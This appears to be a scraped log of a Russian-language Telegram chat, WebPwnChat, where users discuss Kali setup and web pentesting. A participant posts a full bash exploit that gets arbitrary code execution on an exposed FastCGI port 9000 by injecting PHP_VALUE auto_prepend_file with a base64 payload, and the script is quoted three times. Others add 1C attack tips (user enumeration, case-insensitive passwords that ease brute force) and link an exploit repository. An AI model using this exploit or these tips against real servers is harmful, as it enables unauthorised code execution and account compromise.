Size: a a a

2020 November 09

ps

perl -E 'my @drugs =... in WebPwnChat
Lucky
ребзя, а на виртуалке с кали работать как?
Дебиан же есть, лод
источник

S

Slava in WebPwnChat
perl -E 'my @drugs = glob ("/home/plants/*"); say sort "@drugs"' | xargs -n 1 | nl
Дебиан же есть, лод
Дебиан не нужОн.
БолгенОС же есть
источник

ps

perl -E 'my @drugs =... in WebPwnChat
Slava
Дебиан не нужОн.
БолгенОС же есть
ХуелгенОС
источник

L

Lucky in WebPwnChat
ну началось, а просто хотел ведь с инструментами научиться работать...
источник

ps

perl -E 'my @drugs =... in WebPwnChat
Lucky
ну началось, а просто хотел ведь с инструментами научиться работать...
Качай инструменты вручную, на нативный дебилиан.
источник

ps

perl -E 'my @drugs =... in WebPwnChat
И учись.
источник

I

Ivan in WebPwnChat
Lucky
ну началось, а просто хотел ведь с инструментами научиться работать...
в вм выбирай тип подключения bridge и 99% софта будет норм работать. только для ломания соседской вафли придется usb вафлю прокидывать.
источник

I

Ivan in WebPwnChat
и да, в кали некоторый софт из коробки не робит. кали уже не тот 😃
источник

L

Lucky in WebPwnChat
вот и просветили, спасибо ребят!
источник

ps

perl -E 'my @drugs =... in WebPwnChat
Ivan
и да, в кали некоторый софт из коробки не робит. кали уже не тот 😃
Индуисская хуита
источник

N

Nilson in WebPwnChat
Lucky
вот и просветили, спасибо ребят!
Можешь вообще готовый образ виртуалки с кали скачать.
источник

NK

ID:0 in WebPwnChat
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
источник

󠂪󠂪

󠂪󠂪 󠂪󠂪 󠂪󠂪 󠂪󠂪... in WebPwnChat
ID:0
Что нужно знать, при пентесте 1С

* Иногда там выдаются имена пользователей (если включено) в автодополнении, либо можно попробовать обратиться на /ru_RU/e1cib/users.
* Пароли из коробки не чувствительны к регистру. "Пароль" и "пАрОль" - одно и тоже, что уменьшает количество для брута (особенно классно вместе с предыдущим пунктом).
* Внутри часто есть выполнение произвольного кода.
А есть ли какие-либо материалы по пентесту 1C?
Сколько не искал - везде затрагивают только пост эксплуатацию, причем только под windows.
источник

B

Bo🦠oM in WebPwnChat
Жиза
источник

q

qap in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
Еще такая же история работает с uwsgi и apache mod_php
https://github.com/wofeiwo/webcgi-exploits
источник

B

Bo🦠oM in WebPwnChat
Еще б опозновать их нормально
источник

q

qap in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
Надо сигнатурки на досуге в nmap коммитнуть
источник

B

Bo🦠oM in WebPwnChat
Вроде uwsgi еще ловится
источник

B

Bo🦠oM in WebPwnChat
Какой там порт, 3ххх
источник

B

Bo🦠oM in WebPwnChat
Хотя если перевесят, то все
источник